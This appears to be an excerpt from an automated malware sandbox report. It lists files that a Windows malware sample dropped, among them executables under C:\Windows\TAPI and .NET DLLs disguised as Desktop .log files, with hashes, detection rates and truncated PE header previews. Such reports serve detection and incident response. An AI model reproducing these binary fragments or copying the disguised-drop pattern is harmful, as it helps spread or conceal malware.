                                                                                                                                                                        Entropy (8bit):5.7028690200758465
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\gBXkgMjS.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                        Entropy (8bit):5.41854385721431
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\gSeCuhdU.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33792
                                                                                                                                                                        Entropy (8bit):5.541771649974822
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\hbKlfOQH.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                        Entropy (8bit):5.41854385721431
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\kJRJIbpu.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                        Entropy (8bit):5.636032516496583
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\kOfTBNTO.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):342528
                                                                                                                                                                        Entropy (8bit):6.170134230759619
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\kSAcnKQA.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38400
                                                                                                                                                                        Entropy (8bit):5.699005826018714
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\krNbnIjL.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34304
                                                                                                                                                                        Entropy (8bit):5.618776214605176
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\nzLkJbeH.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\oROSeukq.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):70144
                                                                                                                                                                        Entropy (8bit):5.909536568846014
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\tahrXlpt.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38400
                                                                                                                                                                        Entropy (8bit):5.699005826018714
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\xAiiOWpY.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33792
                                                                                                                                                                        Entropy (8bit):5.541771649974822
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\yViIeRfn.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                                                        C:\Users\user\Desktop\yeGIODyj.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.629584586954759
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\zgCYVAKQ.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):342528
                                                                                                                                                                        Entropy (8bit):6.170134230759619
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\zomqzklW.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):50176
                                                                                                                                                                        Entropy (8bit):5.723168999026349
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                        C:\Windows\TAPI\ZWgKQlTqcrSB.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Windows\TAPI\b2c372d662fd88

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
